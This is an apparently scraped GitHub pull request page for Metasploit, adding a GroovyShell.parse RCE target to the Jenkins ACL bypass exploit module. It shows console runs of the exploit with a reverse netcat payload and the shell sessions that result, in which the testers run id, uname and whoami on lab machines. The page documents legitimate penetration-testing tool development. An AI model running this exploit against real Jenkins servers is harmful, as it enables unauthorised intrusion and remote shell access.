Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add newer RCE vector to Jenkins ACL bypass exploit #11864

Merged
merged 5 commits into from May 23, 2019

Conversation

Projects
None yet
3 participants
@wvu-r7
Copy link
Contributor

commented May 21, 2019

msf5 exploit(multi/http/jenkins_metaprogramming) > options

Module options (exploit/multi/http/jenkins_metaprogramming):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.28.128.3     yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins         yes       Base path to Jenkins
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:45020) at 2019-05-21 15:13:26 -0500

id
uid=112(tomcat8) gid=117(tomcat8) groups=117(tomcat8)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

#11466

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 2 times, most recently from d60790f to ebe2bc6 May 22, 2019

@jrobles-r7 jrobles-r7 self-assigned this May 22, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 475ef69 to 0594518 May 22, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 0594518 to 801af31 May 22, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented May 23, 2019

@wvu-r7 LGTM. I did run into the Mdm::Workspace issue that you mentioned previously when using the Java Dropper but that is a separate issue from these changes.

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:8443 
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.22.222.136:8443 -> 172.22.222.112:41071) at 2019-05-23 06:24:17 -0500

uname -a
Linux 8ac8c4e5a351 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 GNU/Linux
whoami
jenkins

@jrobles-r7 jrobles-r7 merged commit 801af31 into rapid7:master May 23, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request May 23, 2019

msjenkins-r7 added a commit that referenced this pull request May 23, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented May 23, 2019

Release Notes

This updates the jenkins_metaprogramming exploit module with an additional target that uses the GroovyShell.parse entry point for command execution.

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented May 23, 2019

Awesome, thanks!

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/jenkins branch May 23, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented May 23, 2019

Failure to stage Java Meterpreter fixed in #11871.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.